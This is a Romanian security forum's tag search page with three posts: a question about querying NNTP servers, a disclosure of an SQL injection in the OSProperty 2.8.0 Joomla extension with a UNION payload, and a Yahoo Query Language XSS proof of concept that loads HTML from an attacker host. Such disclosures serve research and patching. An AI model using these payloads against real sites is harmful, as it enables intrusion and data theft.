Jump to content

Search the Community

Showing results for tags 'query'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 3 results

  1. Hi, I have a log from a newsgroup NNTP header from a newsgroup message containing 3 string/numbers which I would like to further investigate Xref: news.netfront.net 24hoursupport.helpdesk:77925 Injection-Info:logging-data="74569" AND Message-ID: qjmbe4$28q9$1@adenine.netfront.net is there a tool/script/program to query remote NNTP server adenine.netfront.net / netfront.net with those string/numbers 77925/74569/qjmbe4$28q9$1 that would return more info ? thank's in advance :)
  2. OS Solution OSProperty 2.8.0 was vulnerable to an unauthenticated SQL injection in the country_id parameter of the request made to retrieve a list of states for a given country. The version was not bumped when the vulnerability was fixed, but if you download after April 27th, you downloaded a fixed version. http://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property http://joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html Example URL: http://172.31.16.51/index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31 Parameter: country_id (GET) Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31' UNION ALL SELECT NULL,CONCAT(0x716a627171,0x797774584a4b4954714d,0x7162717071)# -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website Source
  3. /*********************************************************************************** ** Exploit Title: Yahoo Query Language Cross Site Scripting Vulnerability ** ** Exploit Author: Peyman D. aka C4T ** ** Vendor Homepage : http://query.yahooapis.com/ ** ** Google Dork: none ** ** Date: 2015-03-08 ** ** Tested on: Windows 7 / Mozila Firefox ** ************************************************************************************ ** Exploit Code: ****************** <html xmlns="http://www.w3.org/1999/xhtml"> <body> <span>Discovered by Peyman D.</span> <span>aka C4T</span> <script> alert('Successfully Exploited'); </script> </body> </html> ************************************************************************************ Location & Vulnerable query: ****************** http://query.yahooapis.com/v1/public/yql?q= select * from html where url='[attacker-website.com]/exploit.html' and xpath='html' ************************************************************************************* ** Proof: ****************** Executable script tag in API's own page: Malicious source: http://hatrhyme.com/alert.html Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/alert.html' and xpath='html' ------------------------------------------------------- Injecting HTML tags in API's own page: Malicious source: http://hatrhyme.com/expl.html Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/expl.html' and xpath='html' ------------------------------------------------------- ****************************************************************************************** ** ** Explanation and the cause of this vulnerability: ** ** http://hatrhyme.com/XSSInYQL.pdf ** ****************************************************************************************** Source
×
×
  • Create New...